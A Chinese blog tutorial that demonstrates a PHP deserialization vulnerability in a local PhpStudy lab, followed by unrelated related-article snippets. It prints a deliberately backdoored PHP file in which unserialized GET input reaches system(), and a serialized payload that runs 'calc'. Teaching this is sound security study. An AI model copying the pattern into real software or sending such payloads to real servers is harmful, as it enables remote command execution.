[Web 安全] PHP 反序列化漏洞 —— PHP 反序列化漏洞演示案例
关注这个专栏的其他相关笔记:[Web 安全] 反序列化漏洞 - 学习笔记-CSDN博客
PHP 反序列化漏洞产生原因
PHP 反序列化漏洞产生的原因就是因为在反序列化过程中,
unserialize()接收的值可控。
0x01:环境搭建
这里笔者是使用 PhpStudy 搭建的环境,如果环境没有配置好的可以参考下面这篇文章:
PHP 环境配置:PhpStudy 环境配置
PhpStudy 安装好后开启它的 Apache 服务,并定位到它网站的根目录下:
将下面的代码保存到 backdoor.php 文件中,并放到 PhpStudy 的网站根目录下:
# FileName: backdoor.php<?phphighlight_file(__FILE__); // 高亮当前文件// 后门 - 程序员自己留的哈class BackDoor {public $command;public function run() {system($this -> command); // 执行 command 里的命令}}$command = $_GET['cmd'];if($command == True) {$cmd = unserialize($command);$cmd -> run();}然后我们通过浏览器访问上面这个文件,如果访问成功就证明环境搭建好了:
http://127.0.0.1/backdoor.php
0x02:漏洞复现
下面我们就来分析一下下面这个程序的代码(其实明摆着就是一个后门,只不过传参需要用到序列化的知识,后面笔者会以几道 CTF 题目做讲解,类型其实差不多):
<?phphighlight_file(__FILE__); // 高亮当前文件// 后门 - 程序员自己留的哈class BackDoor {public $command;public function run() {system($this -> command); // 执行 command 里的命令}}$command = $_GET['cmd']; // 接收一个 GET 型的传参if($command == True) { // 如果 $command 不为空就执行$cmd = unserialize($command); // 执行反序列化$cmd -> run(); // 调用 run() 函数}我们可以看到,目标的 BackDoor 类中有一个 run() 函数,是用来执行系统命令的,这个命令是通过 BackDoor 中的 $command 属性获取的。
上面这个例子比较简单(而且不太真实),相信不少小伙伴已经想到了利用思路了,我们自己构造一个序列化的对象,给 $command 赋一个恶意命令,然后序列化后传给 cmd 执行即可。
首先,我们从网站上,把这个 BackDoor 类当下来,然后给 $command 赋予一个执行计算器的命令,然后实例化 BackDoor 类,并把这个实例化的值进行序列化:
<?php// 后门 - 程序员自己留的哈class BackDoor {public $command = "calc"; // 这个命令会弹计算器public function run() {system($this -> command); // 执行 command 里的命令}} $backdoor = new BackDoor();echo serialize($backdoor); // O:8:"BackDoor":1:{s:7:"command";s:4:"calc";}如上,我们成功拿到了可以执行恶意代码的序列化参数,然后把这个参数通过 cmd 传给服务端即可(俺承认这个例子不咋地,不过基本上反序列化就是这么利用的):
相关文章:
[Web 安全] PHP 反序列化漏洞 —— PHP 反序列化漏洞演示案例
关注这个专栏的其他相关笔记:[Web 安全] 反序列化漏洞 - 学习笔记-CSDN博客 PHP 反序列化漏洞产生原因 PHP 反序列化漏洞产生的原因就是因为在反序列化过程中,unserialize() 接收的值可控。 0x01:环境搭建 这里笔者是使用 PhpStudy 搭建的环…...
es-head(es库-谷歌浏览器插件)
1.下载es-head插件压缩包,并解压缩 2.谷歌浏览器添加插件 3.使用...
第二十:【路由的props配置】
作用:让路由组件更方便的收到参数(可以将路由参数作为props传给组件) {name:xiang,path:detail/:id/:title/:content,component:Detail, 第一种方法:// props的对象写法,作用:把对象中的每一组key-valu…...
Vue 2全屏滚动动画实战:结合fullpage-vue与animate.css打造炫酷H5页面
引言 在移动端H5开发中,全屏滚动效果因其沉浸式体验而广受欢迎。如何快速实现带有动态加载动画的全屏滚动页面?本文将手把手教你使用 Vue 2、全屏滚动插件 fullpage-vue 和动画库 animate.css 3.5.1,打造一个高效且视觉冲击力强的H5页面。通…...
AF3 DataPipeline类process_pdb 方法解读
DataPipeline 类中的 process_pdb 方法用于从 PDB 文件中生成特定蛋白质链的特征,作为 AlphaFold3 预测的输入。它的流程与 process_mmcif 类似,但输入来源是 PDB 文件而非 MmcifObject。 源代码: def process_pdb(self,pdb_path: str,alignment_dir: str,is_distillation:…...
抓包工具 wireshark
1.什么是抓包工具 抓包工具是什么?-CSDN博客 2.wireshark的安装 【抓包工具】win 10 / win 11:WireShark 下载、安装、使用_windows抓包工具-CSDN博客 3.wireshark的基础操作 Wireshark零基础使用教程(超详细) - 元宇宙-Meta…...
OpenBMC:BmcWeb app获取socket
OpenBMC:BmcWeb app.run-CSDN博客 app对象在run函数中调用了setupSocket() static std::vector<Acceptor> setupSocket() {std::vector<Acceptor> acceptors;char** names = nullptr;int listenFdCount = sd_listen_fds_with_names(0, &names);BMCWEB_LOG_DE…...
《深度学习实战》第2集-补充:卷积神经网络(CNN)与图像分类 实战代码解析和改进
以下是对《深度学习实战》第2集中 CIFAR-10 数据集 使用卷积神经网络进行图像分类实战 代码的详细分析,并增加数据探索环节,同时对数据探索、模型训练和评估的过程进行具体说明。所有代码都附上了运行结果配图,方便对比。 《深度学习实战》第…...
nodejs:express + js-mdict 作为后端,vue 3 + vite 作为前端,在线查询英汉词典
向 doubao.com/chat/ 提问: node.js js-mdict 作为后端,vue 3 vite 作为前端,编写在线查询英汉词典 后端部分(express js-mdict ) 1. 项目结构 首先,创建一个项目目录,结构如下࿱…...
《深度剖析Linux 系统 Shell 核心用法与原理_666》
1. 管道符的用法 查找当前目录下所有txt文件并统计行数 # 使用管道符将ls命令的结果传递给wc命令进行行数统计 ls *.txt | wc -l 在/etc目录下查找包含"network"的文件并统计数量 # 使用find命令查找文件,并通过grep查找包含特定字符串的文件…...
:更精准的风险调整收益指标(中英双语))
索提诺比率(Sortino Ratio):更精准的风险调整收益指标(中英双语)
索提诺比率(Sortino Ratio):更精准的风险调整收益指标 📉📊 📌 什么是索提诺比率? 在投资分析中,我们通常使用 夏普比率(Sharpe Ratio) 来衡量风险调整后的…...
minio作为K8S后端存储
docker部署minio mkdir -p /minio/datadocker run -d \-p 9000:9000 \-p 9001:9001 \--name minio \-v /minio/data:/data \-e "MINIO_ROOT_USERjbk" \-e "MINIO_ROOT_PASSWORDjbjbjb123" \quay.io/minio/minio server /data --console-address ":90…...
一周学会Flask3 Python Web开发-Jinja2模板访问对象
锋哥原创的Flask3 Python Web开发 Flask3视频教程: 2025版 Flask3 Python web开发 视频教程(无废话版) 玩命更新中~_哔哩哔哩_bilibili 如果渲染模板传的是对象,如果如何来访问呢? 我们看下下面示例: 定义一个Student类 cla…...
RAGS评测后的数据 如何利用influxdb和grafan 进行数据汇总查看
RAGS(通常指相关性、准确性、语法、流畅性)评测后的数据能借助 InfluxDB 存储,再利用 Grafana 进行可视化展示,实现从四个维度查看数据,并详细呈现每个问题对应的这四个指标情况。以下是详细步骤: 1. 环境准备 InfluxDB 安装与配置 依据自身操作系统,从 InfluxDB 官网下…...
第25周JavaSpringboot实战-电商项目 4.商品分类管理
商品分类模块开发笔记 模块功能概述 实现分类数据的 增删改查 功能核心难点: 分类的父子级目录结构递归实现多级分类查找列表展示顺序控制(从父级向子级递归) 接口说明 后台接口 1. 添加分类 请求地址: /admin/category/add 请求方法: …...
C语言--正序、逆序输出为奇数的位。
题目: 采用正序和逆序分别输出为奇数的位。例如输入12345,正序输出135,逆序输出531 代码: #include <stdio.h>void printOddDigits(int num) {int res 0;int divider 10;while (num / divider > 10) {divider * 10;…...
C#快速调用DeepSeek接口,winform接入DeepSeek查询资料 C#零门槛接入DeepSeek C#接入DeepSeek源代码下载
下载地址<------完整源码 在数字化转型加速的背景下,企业应用系统对智能服务的需求日益增长。DeepSeek作为先进的人工智能服务平台,其自然语言处理、图像识别等核心能力可显著提升业务系统的智能化水平。传统开发模式下,C#开发者需要耗费大…...
H13-821 V3.0 HCIP 华为云服务架构题库
华为云上哪个服务能够用于收集来自主机和云服务的日志数据,并通过海量日志数据的分析与处理帮助开发或运维人员进行问题定位和分析? A:云监控服务 B:云日志服务 C:云审计服务 D:对象存储服务 答案ÿ…...
Linux主机用户登陆安全配置
Linux主机用户登陆安全配置 在Linux主机上进行用户登录安全配置是一个重要的安全措施,可以防止未经授权的访问。以下是如何创建用户hbu、赋予其sudo权限,以及禁止root用户SSH登录,以及通过ssh key管理主机用户登陆。 创建用户hbu 使用具有…...
提升数据洞察力:五款报表软件助力企业智能决策
概述 随着数据量的激增和企业对决策支持需求的提升,报表软件已经成为现代企业管理中不可或缺的工具。这些软件能够帮助企业高效处理数据、生成报告,并将数据可视化,从而推动更智能的决策过程。 1. 山海鲸报表 概述: 山海鲸报表…...
)
从理论到代码:手把手复现李航《统计学习方法》第2版经典算法(附习题思路)
从理论到代码:手把手复现李航《统计学习方法》第2版经典算法 统计学习作为机器学习的重要分支,其理论体系严谨而深厚。李航教授的《统计学习方法》第2版堪称该领域的经典教材,但许多读者在从理论理解到代码实现的跨越中常遇到障碍。本文将带你…...
Windows10 Qt5.15.2环境下MINGW编译VTK-8.2.0的完整指南与常见问题解决
1. 环境准备与工具安装 在Windows10系统下用Qt5.15.2的MINGW编译VTK-8.2.0,首先需要准备好基础工具链。我去年在给医疗影像项目搭建三维可视化平台时就踩过不少坑,后来总结出这套稳定可靠的配置方案。 CMake的选择特别关键,实测3.14.0版本兼容…...
)
开源大模型部署指南:像素剧本圣殿镜像免配置快速上手(Dual-GPU优化)
开源大模型部署指南:像素剧本圣殿镜像免配置快速上手(Dual-GPU优化) 1. 项目概述 像素剧本圣殿(Pixel Script Temple)是一款基于Qwen2.5-14B-Instruct大模型深度微调的专业剧本创作工具。这款工具将强大的AI推理能力…...
如何突破数字图书馆借阅限制:Internet Archive Downloader技术深度解析
如何突破数字图书馆借阅限制:Internet Archive Downloader技术深度解析 【免费下载链接】internet_archive_downloader A chrome/firefox extension that download books from Internet Archive(archive.org) and HathiTrust Digital Library (hathitrust.org) 项…...
程序员相亲指南:软件测试从业者的高光自我介绍术
当“软件测试工程师”遇上“相亲局”,如何用三句话破除“点按钮的”“找bug的”刻板印象?本文从专业视角拆解表达策略,助你展现职业价值与人格魅力。一、困境篇:软件测试相亲的三大认知陷阱1. 致命三连问的杀伤力场景还原…...
终极动态壁纸指南:让Linux桌面随时辰自动变换的完整教程
终极动态壁纸指南:让Linux桌面随时辰自动变换的完整教程 【免费下载链接】dynamic-wallpaper A simple bash script to set wallpapers according to current time, using cron job scheduler. 项目地址: https://gitcode.com/gh_mirrors/dy/dynamic-wallpaper …...
vxe-table企业级主题定制解决方案:CSS变量架构深度解析与UI设计系统实践
vxe-table企业级主题定制解决方案:CSS变量架构深度解析与UI设计系统实践 【免费下载链接】vxe-table vxe table 支持 vue2, vue3 的表格解决方案 项目地址: https://gitcode.com/gh_mirrors/vx/vxe-table 在当今企业级前端应用开发中,表格组件作为…...
终极指南:DeepSeek-OCR如何通过SAM+CLIP双编码器实现高精度文档识别
终极指南:DeepSeek-OCR如何通过SAMCLIP双编码器实现高精度文档识别 【免费下载链接】DeepSeek-OCR Contexts Optical Compression 项目地址: https://gitcode.com/gh_mirrors/de/DeepSeek-OCR DeepSeek-OCR是一款基于SAM(Segment Anything Model&…...
学院实现TPAMI顶刊发表历史性突破
点击下方卡片,关注“CVer”公众号AI/CV重磅干货,第一时间送达点击进入—>【顶刊】投稿交流群添加微信号:CVer2233,小助手拉你进群!扫描下方二维码,加入CVer学术星球!可以获得最新顶会/顶刊上…...
Performance-Fish:让《环世界》流畅度提升400%的终极性能优化方案
Performance-Fish:让《环世界》流畅度提升400%的终极性能优化方案 【免费下载链接】Performance-Fish Performance Mod for RimWorld 项目地址: https://gitcode.com/gh_mirrors/pe/Performance-Fish 你是否曾因《环世界》后期殖民地卡顿而烦恼?当…...